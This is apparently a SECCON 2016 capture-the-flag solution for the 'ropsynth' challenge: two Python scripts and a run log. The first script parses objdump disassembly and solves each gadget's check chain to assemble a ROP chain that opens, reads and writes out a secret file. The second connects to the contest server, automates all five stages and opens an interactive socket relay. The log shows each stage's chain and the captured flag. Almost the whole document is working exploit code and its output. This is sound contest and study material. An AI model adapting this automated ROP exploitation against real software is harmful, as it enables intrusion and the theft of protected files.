#!/usr/bin/python
# -*- coding: utf-8 -*-
import struct
import binascii
def p(a):
    """Pack the integer *a* as one little-endian unsigned 64-bit qword.

    Used for every stack slot of the ROP chain (addresses and pop values
    alike).  *a* must be in ``0 .. 2**64-1``; struct raises ``struct.error``
    otherwise.
    """
    packed = struct.pack("<Q", a)
    return packed
def u(a):
    """Inverse of ``p``: decode exactly 8 little-endian bytes into an int.

    Not used by the rest of this script; kept as the counterpart of ``p``.
    Raises ``struct.error`` unless *a* is exactly 8 bytes long.
    """
    (value,) = struct.unpack("<Q", a)
    return value
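def calc_gadgets(line_itr):
    """Walk the check chains after a register gadget and return the stack
    values that satisfy them.

    In the disassembly (``objdump --no-show-raw-insn -Mintel``, one
    instruction per line, ``addr:<tab>mnemonic operands``) every chain has
    the shape::

        pop  <scratch>
        sub/add/xor <scratch>, imm    (zero or more)
        cmp  <scratch>, imm
        je   <label>
        hlt ...                       (padding, skipped)

    and the sequence of chains ends with ``ret``.  For each chain the
    immediate ``cmp`` expects is run backwards through the arithmetic
    (sub <-> add, xor is its own inverse) so that the value popped from the
    stack ends up equal to the compared constant.  The arithmetic is done on
    Python ints and reduced mod 2**64 once at the end; for add/sub/xor that
    is the same result as 64-bit register wrap-around.

    Args:
        line_itr: iterator over listing lines, positioned on the line right
            after the ``pop <reg>`` / ``syscall`` gadget.  It is consumed up
            to and including the closing ``ret`` line, so the caller's own
            loop resumes after that.

    Returns:
        list of ints (each in ``0 .. 2**64-1``), one per chain, in the
        order the chains appear -- i.e. the order the stack is consumed.

    Raises:
        ValueError: the listing ends before ``ret`` or before a chain's
            ``je``; a chain does not end in ``cmp``; or a chain uses an
            operation other than sub/add/xor.  (The original used
            ``assert`` here, which disappears under ``python -O``.)
    """
    gadgets = []
    mask64 = 0xffffffffffffffff
    while True:
        try:
            head = next(line_itr).split()
        except StopIteration:
            raise ValueError('listing ended before a ret was found')
        mnemonic = head[1]
        if mnemonic == 'hlt':
            continue  # padding between chains
        if mnemonic == 'ret':
            print('[*] ret is found!')
            break
        # Scratch register of this chain, e.g. "rbx" or "r11" from "pop r11".
        target = head[2]
        inst_list = []
        for g_line in line_itr:
            if 'je' in g_line:
                break
            insts = g_line.split()
            # operands look like "r11,0x3857d869"; objdump prints the
            # immediate already sign-extended to 64 bits where applicable.
            imm = int(insts[2].split(',')[1], 0x10)
            inst_list.append((insts[1], imm))
        else:
            raise ValueError('listing ended before je in chain for {}'.format(target))
        if not inst_list or inst_list[-1][0] != 'cmp':
            raise ValueError('chain for {} does not end in cmp'.format(target))
        gadget_val = inst_list[-1][1]
        # Undo the operations from last to first.
        for op, imm in reversed(inst_list[:-1]):
            if op == 'sub':
                gadget_val += imm
            elif op == 'add':
                gadget_val -= imm
            elif op == 'xor':
                gadget_val ^= imm
            else:
                raise ValueError('unsupported op {!r} in chain for {}'.format(op, target))
        gadget_val &= mask64
        print(" gadget value is {:#x}".format(gadget_val))
        gadgets.append(gadget_val)
    return gadgets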
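# 'dumped' is the objdump listing x.py writes for the current stage binary
# (objdump --no-show-raw-insn -Mintel,x86-64 -b binary -D -m i386).  The
# first seven lines are objdump's header and the last element is the empty
# string left by the trailing newline, hence the [7:-1] slice -- brittle if
# the objdump version changes its header, so check here first if parsing
# breaks.
with open('dumped') as dump_file:
    fp = dump_file.read().split('\n')
# Filled by the scan below: name -> {'addr': rebased gadget address,
#                                    'gadgets': [check-chain values]}.
gadgets = {}
line_itr = iter(fp[7:-1])
# Challenge-specific fixed addresses (verify if the service changes):
# SECRET_STR_ADDR is passed as the pathname argument of open(2) in the chain
# below, BUFF_ADDR is the scratch buffer read() fills and write() sends.
SECRET_STR_ADDR = 0x00a00000
BUFF_ADDR = 0x00a00100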
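# Gadget names the payload needs, in the order the scan tests them: the
# first name whose text occurs in the instruction wins, so a "pop rsi" is
# classified before a later "rdi"/"rax" substring could match.
GADGET_NAMES = ('rsi', 'rdi', 'rdx', 'syscall', 'rax')
# objdump numbers the flat binary from 0; every address is rebased onto
# 0x800000, the address the stage code is loaded at in this challenge
# (challenge-specific -- confirm if the service changes).
CODE_BASE = 0x00800000


def _classify(inst_raw):
    """Return the gadget name a listing line starts, or None to skip it.

    ``push rax`` lines are skipped: presumably they are the ``push rax``
    sitting right before a ``pop <reg>``, which build_rop_gadget's
    ``pop_eax`` path re-enters at ``addr - 1``; they are not gadget
    entries of their own.
    """
    for name in GADGET_NAMES:
        if name in inst_raw:
            if name == 'rax' and 'push' in inst_raw:
                return None
            return name
    return None


for line in line_itr:
    line = line.split(':')
    line_n = int(line[0].strip(), 0x10) + CODE_BASE
    inst_raw = line[1].strip()
    gn = _classify(inst_raw)
    if gn is None:
        continue
    print('[+] {} gadgets found!'.format(gn))
    if gn in gadgets:
        # Same as before -- the later occurrence replaces the earlier one --
        # but say so instead of silently switching gadgets.
        print('[!] {} gadgets seen again at {:#x}, replacing the earlier entry'.format(gn, line_n))
    # Consumes the check chains up to and including their closing ret.
    g = calc_gadgets(line_itr)
    print(g)
    gadgets[gn] = {'addr': line_n, 'gadgets': g}

# Fail here with a clear message rather than with a KeyError while the
# payload is being assembled.
missing = [name for name in GADGET_NAMES if name not in gadgets]
if missing:
    raise RuntimeError('no gadget found for: {}'.format(', '.join(missing)))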
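def build_rop_gadget(target_ins, val=0, pop_eax=False):
    """Serialize one gadget of the chain as packed little-endian qwords.

    The frame is: the gadget address, the value its ``pop`` consumes (unless
    ``pop_eax`` or the syscall trampoline), then the precomputed answer for
    every check chain that follows the gadget (``gadgets[target_ins]
    ['gadgets']``) -- exactly the order the stack is consumed in.  Every
    slot is also echoed to stdout for debugging.

    Args:
        target_ins: key into the module-level ``gadgets`` table: 'rax',
            'rdi', 'rsi', 'rdx' or 'syscall'.  KeyError if absent.
        val: immediate loaded into the register.  Ignored for 'syscall' and
            when ``pop_eax`` is set.  Must fit an unsigned 64-bit int, or
            ``struct.error`` is raised by ``p``.
        pop_eax: return to ``addr - 1`` instead of ``addr`` so the byte in
            front of the ``pop`` executes first.  This assumes that byte is
            a one-byte ``push rax`` (the scanner skipped such lines right
            before the pop), turning the gadget into ``push rax; pop <reg>``
            -- i.e. copying the previous syscall's return value into the
            register.  Nothing here verifies that byte; check the listing
            if a stage misbehaves.  The name is historical: no eax/rax pop
            is involved.

    Returns:
        bytes: the packed qwords for this gadget (never empty -- at least
        the address is emitted).
    """
    entry = gadgets[target_ins]
    addr = entry['addr']
    frame = []
    if target_ins == 'syscall':
        # The trampoline takes no immediate; only its check chains follow.
        frame.append(addr)
        print('{:>8}: {:8x}'.format(target_ins, addr))
    elif pop_eax:
        frame.append(addr - 1)
        print('{:>8}: {:8x}'.format(target_ins, addr - 1))
    else:
        frame.append(addr)
        frame.append(val)
        print('{:>8}: {:8x}'.format(target_ins, addr))
        print('{:>8}: {:8x}'.format('val', val))
    for v in entry['gadgets']:
        frame.append(v)
        print('{:>8}: {:8x}'.format('', v))
    # b'' (== '' on Python 2) keeps this working where p() returns bytes.
    return b''.join(map(p, frame))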
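# x86-64 Linux syscall numbers loaded into rax below.
SYS_READ, SYS_WRITE, SYS_OPEN = 0, 1, 2
STDOUT_FILENO = 1

# Three syscalls: open the secret file, read it into BUFF_ADDR, write the
# buffer to stdout.  b'' is '' on Python 2, bytes on Python 3.
payload = b''
# fd = open(SECRET_STR_ADDR, O_RDONLY (0), 0)
payload += build_rop_gadget('rax', SYS_OPEN)
payload += build_rop_gadget('rdi', SECRET_STR_ADDR)
payload += build_rop_gadget('rsi', 0)
payload += build_rop_gadget('rdx', 0)
payload += build_rop_gadget('syscall')
# len = read(fd, buf, 256)
# The fd is still in rax after the syscall, so the rax->rdi copy
# (pop_eax) has to come before rax is reloaded with the syscall number.
payload += build_rop_gadget('rdi', pop_eax=True)
payload += build_rop_gadget('rax', SYS_READ)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('rdx', 256)
payload += build_rop_gadget('syscall')
# write(1, buf, len) -- same ordering constraint: rdx takes read()'s return
# value out of rax first, then rax becomes the syscall number.
payload += build_rop_gadget('rdx', pop_eax=True)
payload += build_rop_gadget('rax', SYS_WRITE)
payload += build_rop_gadget('rdi', STDOUT_FILENO)
payload += build_rop_gadget('rsi', BUFF_ADDR)
payload += build_rop_gadget('syscall')
# One base64 line (b2a_base64 appends the newline); x.py sends the file
# verbatim.
b_payload = binascii.b2a_base64(payload)
print(b_payload.decode('ascii'))
with open('payload', 'wb') as ofp:
    ofp.write(b_payload)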
#!/usr/bin/python
# -*- coding: utf-8 -*-
import binascii
import os
import socket
import struct
import subprocess
import sys
import telnetlib
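def sock(remoteip, remoteport, timeout=None):
    """Open a TCP connection and return ``(socket, unbuffered file object)``.

    The file object is created with ``bufsize=0`` so ``read_until``'s
    one-byte reads and the payload ``write`` hit the socket directly.
    (``bufsize`` is the Python 2 keyword -- this script, like r.py, targets
    Python 2.)  The caller owns both objects; nothing is closed here.

    Args:
        remoteip: host name or IP address.
        remoteport: TCP port.
        timeout: optional socket timeout in seconds, applied to the connect
            and to every later read/write.  The default None keeps the
            original fully blocking behaviour, in which a silent server
            hangs the script forever.

    Returns:
        (socket.socket, file object) -- the pair callers unpack as ``s, f``.

    Raises:
        socket.error (socket.timeout with a timeout set) if the connection
        cannot be established.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if timeout is not None:
        s.settimeout(timeout)
    s.connect((remoteip, remoteport))
    f = s.makefile('rw', bufsize=0)
    return s, f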
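def read_until(f, delim='\n', max_bytes=None):
    """Read from *f* one byte at a time until the data ends with *delim*.

    Single-byte reads are deliberate: the stream from ``sock`` is unbuffered
    and presumably nothing past the delimiter may be consumed, because the
    next stage is read from the same stream.

    Args:
        f: file-like object providing ``read(n)``.
        delim: terminator to wait for; it is part of the returned data.
            An empty delimiter returns '' immediately.
        max_bytes: optional cap on the amount read without seeing *delim*;
            exceeding it raises ValueError instead of growing the buffer
            without bound on unexpected server output.

    Returns:
        everything read, delimiter included.

    Raises:
        EOFError: the stream ended (empty read) before *delim* arrived.
            Previously this spun forever, since ``'' + ''`` never ends with
            the delimiter.
        ValueError: more than *max_bytes* were read without *delim*.
    """
    data = ''
    while not data.endswith(delim):
        ch = f.read(1)
        if not ch:
            raise EOFError('stream closed before {!r}; got {!r}'.format(delim, data))
        data += ch
        if max_bytes is not None and len(data) > max_bytes:
            raise ValueError('no {!r} within {} bytes'.format(delim, max_bytes))
    return data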
def shell(s):
    """Drop into an interactive session on the already-connected socket *s*.

    telnetlib's ``interact`` loop is borrowed purely as a stdin/stdout
    relay: the Telnet object never connects by itself, the live socket is
    attached to it directly.  Blocks until the session ends.  Note that
    telnetlib is deprecated and removed in Python 3.13, so this helper has
    to be replaced when the script is ported.
    """
    relay = telnetlib.Telnet()
    relay.sock = s  # reuse our socket instead of Telnet.open()
    relay.interact()
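# Target service; point HOST/PORT at ('localhost', 4444) to run against a
# local copy.
HOST, PORT = 'ropsynth.pwn.seccon.jp', 10000
s, f = sock(HOST, PORT)
# First line from the server (the "stage 1/5" banner in the transcript).
print(read_until(f))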
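def attack():
    """Solve one stage: fetch the stage code, derive the ROP chain, send it.

    The server sends the stage code as one base64 line.  It is decoded to
    ``bin``, disassembled with objdump into ``dumped`` (the exact format
    r.py parses: Intel syntax, no raw bytes, flat binary, x86-64), r.py is
    run to produce the base64 ``payload`` file, and that file is sent back
    on the module-level stream ``f``.

    Each external step is now checked: with ``os.system`` a failing objdump
    or r.py left a stale ``dumped``/``payload`` behind and the previous
    stage's chain was sent without any error.  r.py is run with the same
    interpreter as this script rather than whatever ``python`` is on PATH.

    Security note: ``bin`` is server-controlled input handed to a
    disassembler.  binutils has a long record of parser memory-safety bugs,
    so run this solver in a disposable environment, not on a workstation.

    Raises:
        binascii.Error: the server's line is not valid base64.
        subprocess.CalledProcessError: objdump or r.py exited non-zero.
    """
    encoded = read_until(f)
    print('encoded')
    print(encoded)
    with open('bin', 'wb') as fp:
        fp.write(binascii.a2b_base64(encoded))
    objdump_cmd = ['objdump', '--no-show-raw-insn', '-Mintel,x86-64',
                   '-b', 'binary', '-D', '-m', 'i386', './bin']
    with open('dumped', 'w') as dump:
        subprocess.check_call(objdump_cmd, stdout=dump)
    subprocess.check_call([sys.executable, 'r.py'])
    with open('payload') as pf:
        fg = pf.read()
    f.write(fg)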
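# The service runs five stages.  The "stage 1/5" line was already consumed
# above, so solve stage 1 first; for each further stage the reply is
# "OK\nstage N/5\n": read_until(f, 'stage') takes "OK\nstage" and the
# following read_until(f) takes " N/5\n" before the next stage's code.
STAGES = 5
attack()
for _ in range(STAGES - 1):
    print(read_until(f, 'stage'))
    print(read_until(f))
    attack()
# After the last OK the service prints the flag; hand the socket to the
# operator so it can be read interactively.
shell(s)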
otms61 commented Dec 11, 2016

$ python x.py
stage 1/5
stage 1/5

encoded
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

[+] rdx gadgets found!
  gadget value is 0xffffffffb43633cd
  gadget value is 0x148b0a9d8
  gadget value is 0x15f4e905
  gadget value is 0xc60aaf25
  gadget value is 0xf40f7252
  gadget value is 0x2ff687ed
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x27265b1
  gadget value is 0x65d851d7
  gadget value is 0xa7a90342
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x10af64310
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0x27601554
  gadget value is 0x841c13c6
  gadget value is 0x7d86f152
  gadget value is 0x3a322b11
  gadget value is 0x43ec813f
  gadget value is 0xb4c6f7b6
  gadget value is 0xbca63ce3
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xfffffffff616a7ac
  gadget value is 0xf7738fc7
[*] ret is found!
     rax:           8001e1
     val:                2
        :        10af64310
     rdi:           800367
     val:           a00000
        : fffffffff616a7ac
        :         f7738fc7
     rsi:           800222
     val:                0
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
     rdx:           800005
     val:                0
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
     rdi:           800366
        : fffffffff616a7ac
        :         f7738fc7
     rax:           8001e1
     val:                0
        :        10af64310
     rsi:           800222
     val:           a00100
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
     rdx:           800005
     val:              100
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
     rdx:           800004
        : ffffffffb43633cd
        :        148b0a9d8
        :         15f4e905
        :         c60aaf25
        :         f40f7252
        :         2ff687ed
     rax:           8001e1
     val:                1
        :        10af64310
     rdi:           800367
     val:                1
        : fffffffff616a7ac
        :         f7738fc7
     rsi:           800222
     val:           a00100
        :         27601554
        :         841c13c6
        :         7d86f152
        :         3a322b11
        :         43ec813f
        :         b4c6f7b6
        :         bca63ce3
 syscall:           800164
        :          27265b1
        :         65d851d7
        :         a7a90342
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

OK
stage
 2/5

encoded
9PT09PT09PRYQVtJgcNp2Fc4SYHzo/haZEmB+y5GBxh0B/T09PT09PRBW0mB63qFBlFJgcNRXwlqSYHruQ9VAEmB64/TNRdJgcMm7Qs1SYHrJLmYH0mB6+RuNjZJgevCjPVTSYH7elK4MHQE9PT09FtIgfNNa6UPSIHze87FUEiB8ydcYWlIgcM3LQoKSIH7nmw5ZHQJ9PT09PT09PT0QV9Jgfd+F60/SYHvf9waTUmB95TLOTtJgfd2TFAjSYHH+8wBVkmB/+1h2Ux0A/T09MP0DwVbSIHzT1OMeEiBw7EYtEtIgfPa58h/SIHr1d+NBUiB+7l4oBB0AvT0W0iB6zLT6U9IgetNb4YlSIHrVdpJJ0iB+9gDsRN0B/T09PT09PRZSIHpf72UF0iBwfE60mpIgfl9WF4FdAj09PT09PT09EFfSYHHjaT2OkmBx8uvOnxJgcdHnqs9SYH3xn2OQEmBx4LotW5Jgccb/LYmSYH3iNDGQkmB/8V6h050BfT09PT0W0iB8394YT5IgcPB5r4bSIHzunz5OUiBwxz/iXZIgcNfZDgPSIHDlA+ORkiB8xrcjE5IgfsX0XA/dAX09PT09EFfSYH3hJCzKEmBx7oXXklJgfc1g7MJSYHHCq2gFkmBx/pBxBFJgfeOCCsHSYH3rZCAQkmBx0JA9UZJgf8yQEMKdAb09PT09PTD9PT09FBfQV9JgceE6rRDSYH3cm5JEkmBx5gJgmtJgfeEb/8cSYH3EktPakmB78x5GwFJgccT3soPSYH3Z6rtHEmB/3aG50x0AvT0w/T0UFpbSIHD0lhVR0iBw3+ouklIgesI1GgaSIHzp90IBkiB+2I2JFB0BPT09PRBXkmB9t2Q1GxJge4wRvlJSYH+UpyjO3QG9PT09PT0XUiB9daIznxIgcWGf3oGSIH9pvMrU3QC9PRBXEmB7AHSF0pJgfSsD3IxSYH0lKH9U0mBxOLNylBJgfwpO1oldAX09PT09MP09PT09F5BXkmB7rVKg2lJge7j5xI8SYH2v481TkmBxvZAEGJJgf504zQFdAT09PT0ww==

[+] rax gadgets found!
  gadget value is 0x4405e624
  gadget value is 0xa3f9238f
  gadget value is 0x6c2ec676
  gadget value is 0x475f8f1
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x66bef5ec
  gadget value is 0xb06b20ac
  gadget value is 0xffffffffb220db0b
  gadget value is 0xfffffffe417dc5d7
  gadget value is 0xffffffffbef286fc
  gadget value is 0xffffffff256774c4
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xffffffff9a6ccd32
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0xffffffffdf85be7c
  gadget value is 0xe948725f
  gadget value is 0x307ffcf6
  gadget value is 0x189580
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0x92a76059
[*] ret is found!
     rax:           800008
     val:                2
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rdi:           800212
     val:           a00000
        : ffffffff9a6ccd32
     rsi:           8002f2
     val:                0
        :         92a76059
     rdx:           80025c
     val:                0
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
     rdi:           800211
        : ffffffff9a6ccd32
     rax:           800008
     val:                0
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rsi:           8002f2
     val:           a00100
        :         92a76059
     rdx:           80025c
     val:              100
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
     rdx:           80025b
        : ffffffffdf85be7c
        :         e948725f
        :         307ffcf6
        :           189580
     rax:           800008
     val:                1
        :         4405e624
        :         a3f9238f
        :         6c2ec676
        :          475f8f1
     rdi:           800212
     val:                1
        : ffffffff9a6ccd32
     rsi:           8002f2
     val:           a00100
        :         92a76059
 syscall:           8000d2
        :         66bef5ec
        :         b06b20ac
        : ffffffffb220db0b
        : fffffffe417dc5d7
        : ffffffffbef286fc
        : ffffffff256774c4
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

OK
stage
 3/5

encoded
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

[+] rsi gadgets found!
  gadget value is 0x266478df
  gadget value is 0xffffffffa3650ffb
  gadget value is 0xffffffff9671139a
  gadget value is 0x128707ce
  gadget value is 0xcd4b846c
  gadget value is 0x78faef97
  gadget value is 0x354c7ff9
  gadget value is 0x4042c1e8
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0x1fedf813c
  gadget value is 0x3a0307ba
  gadget value is 0x7fda48cb
  gadget value is 0xffffffffc5f5c50e
  gadget value is 0x33fa2272
  gadget value is 0x3f153d96
  gadget value is 0xffffffffcaad1e81
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0xffffffff956dfbf6
  gadget value is 0x3b0f87c3
  gadget value is 0xffffffffff01a239
  gadget value is 0x3b31322a
  gadget value is 0xffffffff916b9ef8
  gadget value is 0x10f10f6
  gadget value is 0xffffffffd4b3b867
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x8e853db9
  gadget value is 0x2d03576d
  gadget value is 0xffffffffa7c26bec
  gadget value is 0x107ee944d
  gadget value is 0xa8bbe6ec
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x1113091fe
[*] ret is found!
     rax:           80040d
     val:                2
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rdi:           80017f
     val:           a00000
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rsi:           800005
     val:                0
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
     rdx:           800520
     val:                0
        :        1113091fe
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
     rdi:           80017e
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rax:           80040d
     val:                0
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rsi:           800005
     val:           a00100
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
     rdx:           800520
     val:              100
        :        1113091fe
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
     rdx:           80051f
        :        1113091fe
     rax:           80040d
     val:                1
        :         8e853db9
        :         2d03576d
        : ffffffffa7c26bec
        :        107ee944d
        :         a8bbe6ec
     rdi:           80017f
     val:                1
        :        1fedf813c
        :         3a0307ba
        :         7fda48cb
        : ffffffffc5f5c50e
        :         33fa2272
        :         3f153d96
        : ffffffffcaad1e81
     rsi:           800005
     val:           a00100
        :         266478df
        : ffffffffa3650ffb
        : ffffffff9671139a
        :         128707ce
        :         cd4b846c
        :         78faef97
        :         354c7ff9
        :         4042c1e8
 syscall:           8002b4
        : ffffffff956dfbf6
        :         3b0f87c3
        : ffffffffff01a239
        :         3b31322a
        : ffffffff916b9ef8
        :          10f10f6
        : ffffffffd4b3b867
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

OK
stage
 4/5

encoded
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

[+] syscall gadgets found!
  gadget value is 0x12dfe74c4
  gadget value is 0xffffffffec5d1f81
  gadget value is 0x3a96506f
  gadget value is 0xadb8e0dd
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0xcda938ba
  gadget value is 0xffffffffc107d0f1
  gadget value is 0x3b69f994
  gadget value is 0xa0fd2742
[*] ret is found!
[+] rsi gadgets found!
  gadget value is 0xffffffff6fdd238f
  gadget value is 0x29d402a
  gadget value is 0xa899f167
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x9ee17818
  gadget value is 0x10b4d86fe
  gadget value is 0xd0e82d1a
  gadget value is 0xc67c24dc
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x5922861b
  gadget value is 0xffffffff11bac9bc
[*] ret is found!
     rax:           8002d9
     val:                2
        :         5922861b
        : ffffffff11bac9bc
     rdi:           8000f4
     val:           a00000
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rsi:           800192
     val:                0
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
     rdx:           80022f
     val:                0
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
     rdi:           8000f3
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rax:           8002d9
     val:                0
        :         5922861b
        : ffffffff11bac9bc
     rsi:           800192
     val:           a00100
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
     rdx:           80022f
     val:              100
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
     rdx:           80022e
        :         9ee17818
        :        10b4d86fe
        :         d0e82d1a
        :         c67c24dc
     rax:           8002d9
     val:                1
        :         5922861b
        : ffffffff11bac9bc
     rdi:           8000f4
     val:                1
        :         cda938ba
        : ffffffffc107d0f1
        :         3b69f994
        :         a0fd2742
     rsi:           800192
     val:           a00100
        : ffffffff6fdd238f
        :          29d402a
        :         a899f167
 syscall:           800006
        :        12dfe74c4
        : ffffffffec5d1f81
        :         3a96506f
        :         adb8e0dd
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

OK
stage
 5/5

encoded
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

[+] rsi gadgets found!
  gadget value is 0x2b912533
  gadget value is 0xffffffff3a3e04ef
[*] ret is found!
[+] rdx gadgets found!
  gadget value is 0x1d9aaab5
[*] ret is found!
[+] rdi gadgets found!
  gadget value is 0x4061dab8
  gadget value is 0xffffffffc88cb740
[*] ret is found!
[+] syscall gadgets found!
  gadget value is 0x19452b65
  gadget value is 0x796f034e
  gadget value is 0x4590c902
[*] ret is found!
[+] rax gadgets found!
  gadget value is 0x4d850a7b
  gadget value is 0xffffffffca8d3bee
  gadget value is 0xfffffffed7a9396c
  gadget value is 0x1fba9c9
  gadget value is 0x111fc062b
  gadget value is 0xffffffff5fbf7e39
[*] ret is found!
     rax:           80019d
     val:                2
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rdi:           8000be
     val:           a00000
        :         4061dab8
        : ffffffffc88cb740
     rsi:           800008
     val:                0
        :         2b912533
        : ffffffff3a3e04ef
     rdx:           800070
     val:                0
        :         1d9aaab5
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
     rdi:           8000bd
        :         4061dab8
        : ffffffffc88cb740
     rax:           80019d
     val:                0
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rsi:           800008
     val:           a00100
        :         2b912533
        : ffffffff3a3e04ef
     rdx:           800070
     val:              100
        :         1d9aaab5
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
     rdx:           80006f
        :         1d9aaab5
     rax:           80019d
     val:                1
        :         4d850a7b
        : ffffffffca8d3bee
        : fffffffed7a9396c
        :          1fba9c9
        :        111fc062b
        : ffffffff5fbf7e39
     rdi:           8000be
     val:                1
        :         4061dab8
        : ffffffffc88cb740
     rsi:           800008
     val:           a00100
        :         2b912533
        : ffffffff3a3e04ef
 syscall:           800144
        :         19452b65
        :         796f034e
        :         4590c902
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

OK
SECCON{d28d3afbf80463568d5f}
